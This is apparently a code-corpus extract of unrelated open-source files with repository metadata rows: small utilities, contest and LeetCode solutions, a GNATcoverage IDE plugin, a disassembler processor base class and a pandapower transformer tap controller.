        self.settingsStr(self.settings, 'password', False)
        self.nameRequired()
        # JSON output mode suppresses logging to stdout.
        if self.settings['json']:
            self.StdoutLogging(False)
        else:
            self.StdoutLogging(True)
#########################################################
######################### MAIN ##########################
# Script entry point: delegate to the xremotemount command-line handler.
if __name__ == "__main__":
    xremotemount().run(sys.argv)
| Helly1206/xnas | opt/xnas/xremotemount.py | xremotemount.py | py | 11,557 | python | en | code | 0 | github-code | 90 |
15853073667 | import pandas as pd
import sqlalchemy
from sqlalchemy import create_engine
# **********************************************************************
def getDataFrame(url_address, ind):
    """Download every HTML table found at *url_address* and return table *ind*."""
    tables = pd.read_html(url_address, index_col=None)
    return tables[ind]
# Scrape the first table of the TIOBE index page (requires network access).
df = getDataFrame("https://www.tiobe.com/tiobe-index/",0)
# **********************************************************************
def quickClean(data):
    """Rename the 5th column to "Language" and drop the 3rd and 4th columns.

    Operates in place on *data* and also returns it for chaining.
    Requires at least five columns.
    """
    cols = list(data.columns)
    # Use the raw label as the rename key: the original stringified it with an
    # f-string, which silently fails to match non-string column labels
    # (rename() ignores unknown keys by default) while drop() used raw labels.
    data.rename(columns={cols[4]: "Language"}, inplace=True)
    data.drop(columns=[cols[2], cols[3]], inplace=True)
    return data
# Clean in place; df.head() only builds a preview whose return value is
# discarded outside a notebook.
df = quickClean(df)
df.head()
# **********************************************************************
def getDataBase(db_name_in, db_name_out, dataframe):
    """Write *dataframe* into table *db_name_out* of the SQLite database
    <db_name_in>.db (replacing any existing table) and return the engine."""
    db_url = f"sqlite:///{db_name_in}.db"
    engine = create_engine(db_url)
    dataframe.to_sql(db_name_out, engine, index=False, if_exists="replace")
    return engine
engine = getDataBase("languages","tiobe",df)
# **********************************************************************
df2 = getDataFrame("https://en.wikipedia.org/wiki/Comparison_of_programming_languages",1)
df2.head()
# **********************************************************************
engine = getDataBase("languages","wiki",df2)
# **********************************************************************
pd.read_sql(
"""
SELECT
t.Language,
w.Imperative
FROM
tiobe AS t
LEFT JOIN wiki AS w ON t.Language = w.Language
LIMIT 5
""",
engine
)
| julien-blanchard/personal_website | 06_sqlalchemy/sqlalchemy.py | sqlalchemy.py | py | 1,553 | python | en | code | 0 | github-code | 90 |
# Pick k of n integers so that their product is maximal; print it mod 1e9+7.
MOD = 10 ** 9 + 7
n, k = map(int, input().split())
alst = list(map(int, input().split()))
alst.sort()
# All elements must be taken: the product is forced.
if n == k:
    ans = 1
    for num in alst:
        ans *= num
        ans %= MOD
    print(ans)
    exit()
# Single pick: the largest element wins.
if k == 1:
    print(alst[-1] % MOD)
    exit()
# All non-negative: take the k largest.
if alst[0] >= 0:
    ans = 1
    alst.sort(reverse = True)
    for i in range(k):
        ans *= alst[i]
        ans %= MOD
    print(ans)
    exit()
# All non-positive: for odd k the product is <= 0, so take the k values of
# smallest magnitude (reversed order); for even k the k largest magnitudes.
if alst[-1] <= 0:
    ans = 1
    if k % 2 == 1:
        alst = alst[::-1]
    for i in range(k):
        ans *= alst[i]
        ans %= MOD
    print(ans)
    exit()
# Mixed signs: work with [magnitude, sign] pairs, sign 0 for zeros.
blst = []
for num in alst:
    try:
        blst.append([abs(num), abs(num) // num])
    except ZeroDivisionError:
        blst.append([abs(num), 0])
blst.sort(reverse = True,key = lambda x:x[0])
# NOTE(review): blst[k - 1] is a [magnitude, sign] list, so comparing it with
# the int 0 is always False — this guard is dead code. Zeros among the top k
# are handled by the `else: print(0)` branch in the loop below.
if blst[k - 1] == 0:
    print(0)
    exit()
# Take the k largest magnitudes; track the smallest used magnitude per sign.
minus = 0
last_minus = 0
last_plus = 0
ans_lst = []
for i in range(k):
    if blst[i][1] == -1:
        minus += 1
        last_minus = blst[i][0]
    elif blst[i][1] == 1:
        last_plus = blst[i][0]
    else:
        print(0)
        exit()
    ans_lst.append(blst[i][0])
# First unused magnitude of each sign (candidates for a swap).
next_minus = 0
next_plus = 0
flg_minus = False
flg_plus = False
for i in range(k, n):
    if blst[i][1] == -1 and (not flg_minus):
        next_minus = blst[i][0]
        flg_minus = True
    if blst[i][1] == 1 and (not flg_plus):
        next_plus = blst[i][0]
        flg_plus = True
    if (flg_plus and flg_minus) or blst[i][1] == 0:
        break
# Even number of negatives: product already positive and maximal.
if minus % 2 == 0:
    ans = 1
    for num in ans_lst:
        ans *= num
        ans %= MOD
    print(ans)
else:
    # Odd number of negatives: swap out one factor to flip the sign, choosing
    # the swap that loses the least magnitude (compare cross products).
    minus_s = last_minus * next_minus
    plus_s = last_plus * next_plus
    ans = 1
    if minus == k:
        ans_lst.remove(last_minus)
        ans_lst.append(next_plus)
    elif minus_s == plus_s == 0:
        if next_minus == 0:
            ans_lst.remove(last_minus)
            ans_lst.append(next_plus)
        else:
            print(0)
            exit()
    elif minus_s > plus_s:
        ans_lst.remove(last_plus)
        ans_lst.append(next_minus)
    else:
        ans_lst.remove(last_minus)
        ans_lst.append(next_plus)
    for num in ans_lst:
        ans *= num
        ans %= MOD
    print(ans)
| Aasthaengg/IBMdataset | Python_codes/p02616/s333711401.py | s333711401.py | py | 2,200 | python | en | code | 0 | github-code | 90 |
# Interactive loop: count the vowels of each entered phrase until the user
# enters "q" (prompts and messages are in Spanish and must stay unchanged).
iPrue = 0
while iPrue == 0:
    iCont = 0
    print("-" * 70)
    sFras = input("Ingrese una frase (si quiere salir ingrese la letra ""q""): ")
    sFrasMay = sFras.upper()
    # Count vowels; the phrase is already upper-cased, so i.upper() is a no-op.
    for i in sFrasMay:
        if i.upper() in "AEIOU":
            iCont+= 1
    # Quit sentinel: the phrase is exactly "q"/"Q".
    if sFrasMay == "Q":
        print("-" * 70)
        print("Fin del programa")
        break
    else:
        print(f"La frase /{sFras}/ tiene {iCont} vocales")
print(f"La frase /{sFras}/ tiene {iCont} vocales") | AlejandroP75/CampusAP75 | Python/Software Review/05-Ejercicio3_Estructuras_Condicionales_Validacion.py | 05-Ejercicio3_Estructuras_Condicionales_Validacion.py | py | 426 | python | es | code | 0 | github-code | 90 |
37788487674 | """ This plugin adds support for GNATcoverage.
This plugin provides the following:
* A new Build Mode "gnatcov"
* Several new project attributes which GPS will
use to drive various tools in the context of
GNATcoverage
* Build targets to launch runs and analyses
* Menus corresponding to these build targets.
The Build Mode "gnatcov" is listed in the Build Mode
combo, in the main toolbar. Objects generated under
this build mode are generated in a subdirectory "gnatcov"
in all object and executable directories specified by
the project hierarchy.
The following Project Properties are added, which are
available in the "GNATcov" section of the Project
Properties editor, and which map to attributes in a
package "IDE_Coverage" in the project files.
* Gnatcov_Mode_Switches: switches that GPS will pass
to the command line used to build while the "gnatcov"
Build Mode is selected
* Level_Run: the coverage level to pass to the
"gnatcov run" command
* Switches_Run: additional switches to pass to
the "gnatcov run" command
* Level_Coverage: the coverage level to pass to
the "gnatcov coverage" command
* Switches_Coverage: additional switches to pass
to the "gnatcov coverage" command
This plugin defines two new build targets, to launch
"gnatcov run" and "gnatcov coverage", automatically
generated for every executable defined in the project
hierarchy, along with menus, under the menu
Tools->GNATcoverage.
In addition, this plugin automatically loads or refreshes
the Coverage Report in GPS after every call to the
"gnatcov coverage" build target.
With this plugin, the steps to follow for a typical
GNATcoverage session would be:
1 - switch to the "gnatcov" Build Mode in the toolbar
2 - build the executable using the standard mechanism
3 - launch a first run using the menu
Tools->GNATcoverage->Run under gnatcov
4 - launch a first analysis using the menu
Tools->GNATcoverage->Coverage with gnatcov
5 - edit the code or the test driver, then rerun
steps 2, 3, 4
All these steps can be executed at once via the 'Run GNATcov'
button, which is added to the main toolbar when the plugin
is enabled.
Note: this plugin activates only when the command-line tool
"gnatcov" is found on the PATH.
"""
###########################################################################
# No user customization below this line
###########################################################################
import os.path
import GPS
from extensions.private.xml import X
import os_utils
import workflows.promises as promises
import workflows
def list_to_xml(items):
    """Serialize *items* to newline-separated text (one XML node per line)."""
    return '\n'.join(map(str, items))
# Locate the gnatcov executable on PATH; the install root is one level above
# the binary's directory, or None when gnatcov is not installed.
gnatcov_path = os_utils.locate_exec_on_path('gnatcov')
gnatcov_install_dir = (
    os.path.join(os.path.dirname(gnatcov_path), '..')
    if gnatcov_path else
    None
)
class GNATcovPlugin(object):
    """GPS integration for GNATcoverage.

    Declares the GNATcov project attributes, the 'gnatcov' build mode, the
    build targets and menus, the toolbar workflow button and the
    documentation entries (see the module docstring for the workflow).
    """

    PLUGIN_MENU = '/Analyze/Coverage/GNATcov/'

    # Keep this style name synchronized with Code_Coverage.GNATcov.

    PROJECT_ATTRIBUTES = [
        X(
            'project_attribute',
            package='IDE_Coverage',
            name='Gnatcov_Mode_Switches',
            label="Switches in 'gnatcov' mode",
            description=("Extra build switches to pass to the builder when in"
                         " 'gnatcov' mode."),
            editor_page='GNATcov',
            editor_section='Build',
            hide_in='wizard library_wizard',
        ).children(X('string')),

        X(
            'project_attribute',
            name='Level_Run',
            label='Coverage Level',
            package='IDE_Coverage',
            editor_page='GNATcov',
            editor_section='Run',
            hide_in='wizard library_wizard',
            description='The coverage level to pass to gnatcov run.',
        ).children(
            X('choice').children('branch'),
            X('choice').children('insn'),
            X('choice', default='true').children('stmt'),
            X('choice').children('stmt+decision'),
            X('choice').children('stmt+mcdc'),
        ),

        X(
            'project_attribute',
            name='Switches_Run',
            label='Extra switches',
            package='IDE_Coverage',
            editor_page='GNATcov',
            editor_section='Run',
            hide_in='wizard library_wizard',
            description='Extra build switches to pass to gnatcov run.',
        ).children(X('string')),

        X(
            'project_attribute',
            name='Level_Coverage',
            label='Coverage Level',
            package='IDE_Coverage',
            editor_page='GNATcov',
            editor_section='Coverage',
            hide_in='wizard library_wizard',
            description='The coverage level to pass to gnatcov coverage.',
        ).children(
            X('choice').children('branch'),
            X('choice').children('insn'),
            X('choice', default='true').children('stmt'),
            X('choice').children('stmt+decision'),
            X('choice').children('stmt+mcdc'),
        ),

        X(
            'project_attribute',
            name='Switches_Coverage',
            label='Extra switches',
            package='IDE_Coverage',
            editor_page='GNATcov',
            editor_section='Coverage',
            hide_in='wizard library_wizard',
            description='Extra build switches to pass to gnatcov coverage.',
        ).children(X('string')),
    ]

    BUILD_MODES = [
        X('builder-mode', name='gnatcov').children(
            X('description').children('Build with GNATcoverage information'),
            X('subdir').children('gnatcov'),
            X('supported-model').children('builder'),
            X('supported-model').children('gnatmake'),
            X('supported-model').children('gprbuild'),
            X('supported-model', filter='--subdirs=').children('gnatcov-run'),
            X('supported-model', filter='--subdirs=').children(
                'gnatcov-coverage'),
            X('supported-model', filter='--subdirs=').children('gprclean'),
            X('supported-model', filter='--subdirs=').children(
                'GNATtest execution mode'),
            X('extra-args', sections='-cargs').children(
                X('arg').children("%attr(ide_coverage'gnatcov_mode_switches)"),
                X('arg').children('--subdirs=%subdir'),
                X('arg', section='-cargs').children('-g'),
                X('arg', section='-cargs').children('-fdump-scos'),
                X('arg', section='-cargs').children('-fpreserve-control-flow'),
            )
        )
    ]

    BUILD_TARGETS = [
        X('target-model', name='gnatcov-build-main', category='').children(
            X('description').children('Build Main with the gnatcov switches'),
            X('command-line').children(
                X('arg').children('gprbuild')
            ),
            X('iconname').children('gps-build-all-symbolic'),
            X('switches', command='%(tool_name)s', columns='2', lines='2'),
        ),
        X('target', model='gnatcov-build-main', category='GNATcov',
          name='GNATcov Build Main', menu=PLUGIN_MENU).children(
            X('target-type').children('executable'),
            X('in-toolbar').children('FALSE'),
            X('in-menu').children('TRUE'),
            X('read-only').children('TRUE'),
            X('output-parsers').children(
                'output_chopper utf_converter console_writer end_of_build'),
            X('iconname').children('gps-build-all-symbolic'),
            X('launch-mode').children('MANUALLY'),
            X('command-line').children(
                X('arg').children('%builder'),
                X('arg').children('-P%PP'),
                X('arg').children('%subdirsarg'),
                X('arg').children('-s'),
                X('arg').children('-cargs'),
                X('arg').children('-g'),
                X('arg').children('-fdump-scos'),
                X('arg').children('-fpreserve-control-flow')
            )
        ),

        # Program execution under instrumented execution environment
        X('target-model', name='gnatcov-run', category='').children(
            X('description').children('Run under GNATcov for code coverage'),
            X('command-line').children(
                X('arg').children('gnatcov'),
                X('arg').children('run'),
            ),
            X('iconname').children('gps-build-all-symbolic'),
            X('switches', command='%(tool_name)s', columns='1', lines='1')
        ),
        X('target', model='gnatcov-run', category='GNATcov',
          name='Run under GNATcov', menu=PLUGIN_MENU).children(
            X('target-type').children('executable'),
            X('in-toolbar').children('FALSE'),
            X('in-menu').children('TRUE'),
            X('read-only').children('TRUE'),
            X('output-parsers').children(
                'output_chopper utf_converter console_writer end_of_build'),
            X('iconname').children('gps-build-all-symbolic'),
            X('launch-mode').children('MANUALLY'),
            X('command-line').children(
                X('arg').children('gnatcov'),
                X('arg').children('run'),
                X('arg').children('-P%PP'),
                X('arg').children('--recursive'),
                X('arg').children('%target'),
                X('arg').children('-c'),
                X('arg').children("%attr(ide_coverage'level_run,stmt)"),
                X('arg').children('-o'),
                X('arg').children('%TT.trace'),
                X('arg').children('%E'),
                X('arg').children("%attr(ide_coverage'switches_run)"),
            ),
        ),

        # Coverage report generation
        X('target-model', name='gnatcov-coverage', category='').children(
            X('description').children('Code coverage with GNATcov'),
            X('command-line').children(
                X('arg').children('gnatcov'),
                X('arg').children('coverage'),
                X('arg').children('-P%PP'),
                X('arg').children('--recursive'),
                X('arg').children('%target'),
                X('arg').children('--annotate=xcov'),
            ),
            X('iconname').children('gps-build-all-symbolic'),
            X('switches', command='%(tool_name)s', columns='1', lines='4'),
        ),
        X('target', model='gnatcov-coverage', category='GNATcov',
          name='Generate GNATcov Main Report',
          menu=PLUGIN_MENU).children(
            X('target-type').children('executable'),
            X('in-toolbar').children('FALSE'),
            X('in-menu').children('TRUE'),
            X('read-only').children('TRUE'),
            X('output-parsers').children(
                'output_chopper utf_converter console_writer end_of_build'),
            X('iconname').children('gps-build-all-symbolic'),
            X('launch-mode').children('MANUALLY'),
            X('command-line').children(
                X('arg').children('gnatcov'),
                X('arg').children('coverage'),
                X('arg').children('-P%PP'),
                X('arg').children('--recursive'),
                X('arg').children('%target'),
                X('arg').children('-c'),
                X('arg').children("%attr(ide_coverage'level_coverage,stmt)"),
                X('arg').children('--annotate=xcov+'),
                X('arg').children('--output-dir=%O'),
                X('arg').children('-T'),
                X('arg').children('%TT.trace'),
                X('arg').children("%attr(ide_coverage'switches_coverage)"),
            ),
        ),
    ]

    GNATCOV_DOCUMENTATION = [
        X('doc_path').children(
            os.path.join(gnatcov_install_dir, 'share',
                         'doc', 'gnatcoverage', 'html')
            if gnatcov_install_dir else
            None
        ),
        X('documentation_file').children(
            X('name').children('gnatcov.html'),
            X('descr').children("GNATcoverage User's Guide"),
            X('category').children('GNATcoverage'),
            X('menu', before='About').children(
                "/Help/GNATcoverage/GNATcoverage User's Guide"
            ),
        ),
    ]

    GNATEMU_DOCUMENTATION = [
        X('doc_path').children('share/doc/gnatemu/html'),
        X('documentation_file').children(
            X('name').children('gnatemulator.html'),
            X('descr').children('GNATemulator Documentation'),
            X('category').children('GNATcoverage'),
            X('menu', before='About').children(
                '/Help/GNATcoverage/GNATemulator Documentation'
            ),
        ),
    ]

    def __init__(self):
        # Create all custom things that do not require GPS' GUI to be ready
        # (i.e.: all but menus and hooks).
        for xml_nodes in (
            self.PROJECT_ATTRIBUTES, self.BUILD_MODES,
            self.GNATCOV_DOCUMENTATION, self.GNATEMU_DOCUMENTATION,
        ):
            GPS.parse_xml(list_to_xml(xml_nodes))

        # Create the GNATcoverage toolbar button
        self.create_toolbar_button()

        # Defer further initialization to when GPS is completely ready.
        GPS.Hook('gps_started').add(self.on_gps_started)

    def create_toolbar_button(self):
        """Register the 'Run GNATcoverage' workflow as a toolbar target."""
        workflows.create_target_from_workflow(
            target_name="Run GNATcoverage",
            workflow_name="run-gnatcov",
            workflow=self.run_gnatcov_wf,
            icon_name="gps-run-gnatcov-symbolic",
            parent_menu="/Build/Workflow/GNATcov/")

    def run_gnatcov_wf(self, main_name):
        """Workflow: build *main_name*, run it under gnatcov, build the report."""
        # Build the project with GNATcov switches
        p = promises.TargetWrapper("GNATcov Build Main")
        r = yield p.wait_on_execute()
        # Value comparison: the original 'r is not 0' compared identity with an
        # int literal (SyntaxWarning on Python 3.8+, unreliable semantics).
        if r != 0:
            GPS.Console("Messages").write("Can't build the project with " +
                                          "the GNATcov switches", mode="error")
            return

        # Get the executable to analyze
        exe = str(GPS.File(main_name).executable_path)

        # Run GNATcov on it
        p = promises.TargetWrapper("Run under GNATcov")
        r = yield p.wait_on_execute(exe)
        if r != 0:
            GPS.Console("Messages").write("GNATcov run failed ", mode="error")
            return

        # Generate and display the GNATcov Coverage Report
        p = promises.TargetWrapper("Generate GNATcov Main Report")
        r = yield p.wait_on_execute(exe)

    def on_gps_started(self, hook):
        """Finish initialization once the GPS GUI exists."""
        # Now the parent menu is present, fill it with custom targets.
        GPS.parse_xml(list_to_xml(self.BUILD_TARGETS))
        GPS.Hook('compilation_finished').add(self.on_compilation_finished)

    def reload_gnatcov_data(self):
        """Clean the coverage report and reload it from the files."""
        # If needed, switch to GNATcov build mode.
        if GPS.Preference("Coverage-Toolchain").get() != 'Gnatcov':
            GPS.Preference("Coverage-Toolchain").set('Gnatcov')

        GPS.execute_action("coverage clear from memory")

        if GPS.Project.root().is_harness_project():
            a = GPS.CodeAnalysis.get("Coverage Report")
            original = GPS.Project.root().original_project().file()
            a.add_gcov_project_info(original)
        else:
            GPS.execute_action("coverage load data for all projects")

    def on_compilation_finished(self, hook, category,
                                target_name="", mode_name="", status=""):
        """Called whenever a compilation ends."""

        # If compilation failed, do nothing.
        if status:
            return

        if target_name in ["Generate GNATcov Main Report"]:
            self.reload_gnatcov_data()
# This plugin makes sense only if GNATcoverage is available.
# Instantiated at module load time; all registration happens in __init__.
if os_utils.locate_exec_on_path('gnatcov'):
    plugin = GNATcovPlugin()
| AaronC98/PlaneSystem | Code/share/gps/support/ui/gnatcov.py | gnatcov.py | py | 15,865 | python | en | code | 0 | github-code | 90 |
10511831109 | import Utils
import numpy as np
import matplotlib.pyplot as plt
import math
# Centers an image based on position of dots
# Not used in standard workflow because translation blurs the image
def CenterImage(image, showTranslate=False):
    """Center an image based on the positions of its non-zero pixels (dots).

    First translates the image so the centroid of all dots coincides with the
    geometric image center, then translates again so the dot nearest the
    center sits exactly on it.  Returns the translated image.

    Not used in the standard workflow because translation blurs the image.
    """
    # Geometric center of the image.
    height, width = Utils.GetImageSize(image, path=False)
    center = (width / 2, height / 2)

    # Pass 1: move the centroid of all non-zero pixels onto the image center.
    rows, cols = np.where(image != 0)
    xAvg = np.average(cols)
    yAvg = np.average(rows)
    image = Utils.TranslateImage(image, xAvg - center[0], yAvg - center[1])

    # Display new image with calculated centroid (red) and image center (blue).
    if showTranslate:
        plt.imshow(image, cmap="gray")
        plt.scatter(xAvg, yAvg, s=50, c="r")
        plt.scatter(center[0], center[1], s=50, c="b")
        plt.show()

    # Pass 2: re-find the points and snap the one nearest the center onto it.
    rows, cols = np.where(image != 0)
    points = list(zip(cols, rows))
    # min() returns the first point at minimal distance, matching the original
    # distances.index()-based search; math.hypot is the same Euclidean metric.
    centralPoint = min(points,
                       key=lambda p: math.hypot(p[0] - center[0], p[1] - center[1]))
    image = Utils.TranslateImage(image,
                                 centralPoint[0] - center[0],
                                 centralPoint[1] - center[1])

    # Display new image with central point (red) and center of image (blue).
    if showTranslate:
        plt.imshow(image, cmap="gray")
        plt.scatter(centralPoint[0], centralPoint[1], s=50, c="r")
        plt.scatter(center[0], center[1], s=50, c="b")
        plt.show()

    return image
| MANATEE-UF/CrystallographyClassification | RecyclingBin/CenterImage.py | CenterImage.py | py | 1,912 | python | en | code | 0 | github-code | 90 |
5101216298 | class Solution:
def oddCells(self, n: int, m: int, indices: list[list[int]]) -> int:
n_point=[0 for _ in range(n)]
m_point=[0 for _ in range(m)]
for i in range(len(indices)):
ind_i=indices[i]
n_point[ind_i[0]]+=1
m_point[ind_i[1]]+=1
ans=0
for i in range(n):
for j in range(m):
if( (n_point[i]+m_point[j])%2 != 0 ):
ans+=1
return ans | WAT36/procon_work | procon_python/src/leetcode/1252_Cells_with_Odd_Values_in_a_Matrix.py | 1252_Cells_with_Odd_Values_in_a_Matrix.py | py | 470 | python | en | code | 1 | github-code | 90 |
37277126593 | import logging
import re
from oda.libs.odb.disassembler.ofd import Ofd
from .instruction import *
logger = logging.getLogger(__name__)
class Processor(object):
    """Architecture-neutral base for disassembly processors.

    Holds the regular expressions used to parse disassembly lines and
    exposes hooks that architecture subclasses override.
    """

    def __init__(self, odb_file):
        # Presentation / bookkeeping state.
        self.vma = ""
        self.vmaStr = []
        self.branchLineHtml = ""
        self.largestInstSize = 0
        self.opcodeTypes = {}
        self.instSampleInterval = 50

        # {funcAddrA: [crossRef0, crossRef1], funcAddrB: [crossRef0, crossRef1]}
        self.options = []

        # raw binary bytes "xx xx .."
        self.rawBytesRegExStr = "((?:[0-9a-f]{2} )+)"

        self.errorInstRegExStr = "\(bad\)"
        self.errorInstRegEx = re.compile(self.errorInstRegExStr)

        # don't include "<symbol_name>" as part of operands
        self.opcodeRegExStr = "^(\w+)\s+([^<]+)"
        self.opcodeRegEx = re.compile(self.opcodeRegExStr)

        self.odb_file = odb_file

        # Full disassembly line: leading whitespace, vma, raw bytes, instruction.
        line_pattern = "^\s*" + "([0-9a-f]*)\s+" + self.rawBytesRegExStr + "\s+(.*)$"
        self.instParserRegEx = re.compile(line_pattern)

        # Without an odb file the analyzer is severely crippled and only
        # useful for getting platform options.
        if odb_file:
            self.ofd = Ofd(odb_file.get_binary())

    def processOptions(self, options):
        # Subclasses (e.g. mips) override this when options need rewriting.
        return options

    def getInstructionType(self, opcode):
        try:
            return self.opcodeTypes[opcode]
        except KeyError:
            return InstructionType.normal

    def computeTargetAddr(self, inst):
        # Implemented by architecture subclasses.
        pass

    def getMaxInstructionLenBytes(self):
        # Implemented by architecture subclasses.
        pass
def get_processor(arch, odb_file):
    """Instantiate the architecture-specific Processor subclass for *arch*.

    Falls back to the generic Processor (only useful for platform options)
    when no module named after the architecture exists.
    """
    # for now, ignore everything after the colon (e.g. "mips:isa32" -> "mips")
    arch = arch.split(':')[0]
    name = 'oda.libs.odb.disassembler.processors.' + arch
    try:
        mod = __import__(name)
    except ImportError:
        return Processor(odb_file)
    # __import__ returns the top-level package; walk down to the leaf module.
    for comp in name.split('.')[1:]:
        mod = getattr(mod, comp)
    # Each processor module exposes a class/factory named after the arch.
    initFunc = getattr(mod, arch)
    return initFunc(odb_file)
return obj | vancaho/oda | django/oda/libs/odb/disassembler/processors/processor.py | processor.py | py | 2,420 | python | en | code | null | github-code | 90 |
# Read m and n, then answer whether m equals n**x for some exponent x >= 1.
# NOTE(review): exponent 0 is never tried, so m == 1 only prints "yes" for n == 1.
m,n=map(int,input().split())
k=0
# k acts as a found-flag; the search stops at the first matching exponent.
for x in range(1,m+1):
    if(m==(n**x)):
        k=k+1
        break
if(k==1):
    print("yes")
else:
    print("no")
| Shamabanu/python | power or not.py | power or not.py | py | 152 | python | en | code | 2 | github-code | 90 |
71915508776 | from __future__ import division
__author__ = 'lthurner'
import numpy as np
from pandapower.control.controller.trafo_control import TrafoController
class ContinuousTapControl(TrafoController):
    """
    Trafo Controller with local tap changer voltage control.
    INPUT:
        **net** (attrdict) - Pandapower struct
        **tid** (int) - ID of the trafo that is controlled
        **vm_set_pu** (float) - Maximum OLTC target voltage at bus in pu
    OPTIONAL:
        **tol** (float, 0.001) - Voltage tolerance band at bus in percent (default: 1% = 0.01pu)
        **side** (string, "lv") - Side of the transformer where the voltage is controlled
        **trafo_type** (float, "2W") - Trafo type ("2W" or "3W")
        **in_service** (bool, True) - Indicates if the controller is currently in_service
        **check_tap_bounds** (bool, True) - In case of true the tap_bounds will be considered
        **drop_same_existing_ctrl** (bool, False) - Indicates if already existing controllers of the same type and with the same matching parameters (e.g. at same element) should be dropped
    """
    def __init__(self, net, tid, vm_set_pu, tol=1e-3, side="lv", trafotype="2W", in_service=True,
                 check_tap_bounds=True, level=0, order=0, drop_same_existing_ctrl=False, **kwargs):
        super().__init__(net, tid=tid, side=side, tol=tol, in_service=in_service,
                         trafotype=trafotype,
                         level=level, order=order, drop_same_existing_ctrl=drop_same_existing_ctrl,
                         matching_params={"tid": tid, 'trafotype': trafotype}, **kwargs)
        # NOTE(review): matching_params is already passed to super() above;
        # this re-assignment looks redundant — confirm against TrafoController.
        self.matching_params = {"tid": tid, 'trafotype': trafotype}
        t = self.net[self.trafotable]
        b = self.net.bus
        # Nominal transformer ratio relative to the rated voltages of the
        # connected buses; used to translate a voltage deviation into taps.
        # NOTE(review): the "2W" branch and the side == "lv" branch compute
        # the identical expression.
        if trafotype == "2W":
            self.t_nom = t.at[tid, "vn_lv_kv"] / t.at[tid, "vn_hv_kv"] * \
                         b.at[self.net[self.trafotable].at[tid, "hv_bus"], "vn_kv"] / \
                         b.at[self.net[self.trafotable].at[tid, "lv_bus"], "vn_kv"]
        elif side == "lv":
            self.t_nom = t.at[tid, "vn_lv_kv"] / t.at[tid, "vn_hv_kv"] * \
                         b.at[self.net[self.trafotable].at[tid, "hv_bus"], "vn_kv"] / \
                         b.at[self.net[self.trafotable].at[tid, "lv_bus"], "vn_kv"]
        elif side == "mv":
            self.t_nom = t.at[tid, "vn_mv_kv"] / t.at[tid, "vn_hv_kv"] * \
                         b.at[self.net[self.trafotable].at[tid, "hv_bus"], "vn_kv"] / \
                         b.at[self.net[self.trafotable].at[tid, "mv_bus"], "vn_kv"]
        self.check_tap_bounds = check_tap_bounds
        self.vm_set_pu = vm_set_pu
        self.trafotype = trafotype
        # Continuous control: tap_pos must hold fractional values.
        if trafotype == "2W":
            self.net.trafo["tap_pos"] = self.net.trafo.tap_pos.astype(float)
        elif trafotype == "3W":
            self.net.trafo3w["tap_pos"] = self.net.trafo3w.tap_pos.astype(float)
        self.tol = tol
    def control_step(self):
        """
        Implements one step of the ContinuousTapControl
        """
        # Deviation of the measured bus voltage from the set point (pu).
        delta_vm_pu = self.net.res_bus.at[self.controlled_bus, "vm_pu"] - self.vm_set_pu
        # Convert the voltage deviation into a (fractional) number of tap steps.
        tc = delta_vm_pu / self.tap_step_percent * 100 / self.t_nom
        self.tap_pos += tc * self.tap_side_coeff * self.tap_sign
        if self.check_tap_bounds:
            self.tap_pos = np.clip(self.tap_pos, self.tap_min, self.tap_max)
        # WRITE TO NET
        self.net[self.trafotable].at[self.tid, "tap_pos"] = self.tap_pos
    def is_converged(self):
        """
        The ContinuousTapControl is converged, when the difference of the voltage between control steps is smaller
        than the Tolerance (tol).
        """
        # An out-of-service transformer needs no further control steps.
        if not self.net[self.trafotable].at[self.tid, 'in_service']:
            return True
        vm_pu = self.net.res_bus.at[self.controlled_bus, "vm_pu"]
        self.tap_pos = self.net[self.trafotable].at[self.tid, 'tap_pos']
        difference = 1 - self.vm_set_pu / vm_pu
        # A tap changer saturated at its bound while the voltage still violates
        # the set point also counts as converged (no further action possible).
        if self.check_tap_bounds:
            if self.tap_side_coeff * self.tap_sign == 1:
                if vm_pu < self.vm_set_pu and self.tap_pos == self.tap_min:
                    return True
                elif vm_pu > self.vm_set_pu and self.tap_pos == self.tap_max:
                    return True
            elif self.tap_side_coeff * self.tap_sign == -1:
                if vm_pu > self.vm_set_pu and self.tap_pos == self.tap_min:
                    return True
                elif vm_pu < self.vm_set_pu and self.tap_pos == self.tap_max:
                    return True
        return abs(difference) < self.tol
| thediavel/RL-ThesisProject-ABB | env/Lib/site-packages/pandapower/control/controller/trafo/ContinuousTapControl.py | ContinuousTapControl.py | py | 4,602 | python | en | code | 3 | github-code | 90 |
from node import Node

# Set this to True to get a full tree print out
VERBOSE = True

# Read each word of the input file into a list, one word per line, upper-cased.
with open('input.txt', 'r') as f:
    wordlist = f.read().splitlines()
wordlist = [s.upper() for s in wordlist]

# Sort into alphabetical order; this clusters '#' comment lines at the front
# (ASCII '#' sorts before letters and digits).
wordlist.sort()

# Skip past the leading commented lines.  The original loop stopped at
# len(wordlist) - 1, so a comment on the last line was never detected;
# startswith() also avoids an IndexError on empty lines.
i = 0
while i < len(wordlist):
    if not wordlist[i].startswith('#'):
        break
    i += 1

# Ensure the list has some words in it (fires when the file is empty or
# contains only comments — the original guard was unreachable in that case).
if i >= len(wordlist):
    print('No elements found in list.')
    exit(0)
del wordlist[:i]

# This empty node will act as the head of the tree
head = Node()

# Add each word to the tree by creating new nodes only where they do not exist.
for word in wordlist:
    parent = head
    for letter in word:
        if parent.getChildByData(letter) is None:
            parent.addChild(letter)
        parent = parent.getChildByData(letter)
    parent.validEnd = True

# Collapse the tree to get rid of extra nodes that have no possibility
# of being reached by themself.
head.collapse()

if VERBOSE:
    head.printTree()

# Generate the regular expression from the head of the tree.
fullRegEx = head.generateRegEx()
print(fullRegEx)
print(fullRegEx) | jkoppenhaver/regexGenerator | main.py | main.py | py | 1,209 | python | en | code | 11 | github-code | 90 |
3213772266 | #!/usr/bin/env python
# coding: utf-8
def find_indices(input_list, n):
    """Return indices (i, j), i < j, of two distinct elements summing to *n*.

    Preserves the original tie-breaking: the earliest index holding the
    complement is returned.  Returns None when no such pair exists.

    Runs in O(len(input_list)); the original scanned dict.values() and then
    the keys for every element, which is O(n^2).
    """
    first_seen = {}  # value -> earliest index where it occurred
    for j, value in enumerate(input_list):
        complement = n - value
        if complement in first_seen:
            return first_seen[complement], j
        # Only remember the first occurrence so duplicate values resolve to
        # the earliest index, exactly like the original values() scan.
        if value not in first_seen:
            first_seen[value] = j
    return None
| Bagich/AppliedPython | homeworks/homework_01/hw1_arrsearch.py | hw1_arrsearch.py | py | 356 | python | en | code | 0 | github-code | 90 |
16931626321 | """
This class provides a general Systematics class
"""
import copy
import logging
import numpy as np
import pandas as pd
from abc import ABC, abstractmethod
from collections.abc import Sequence
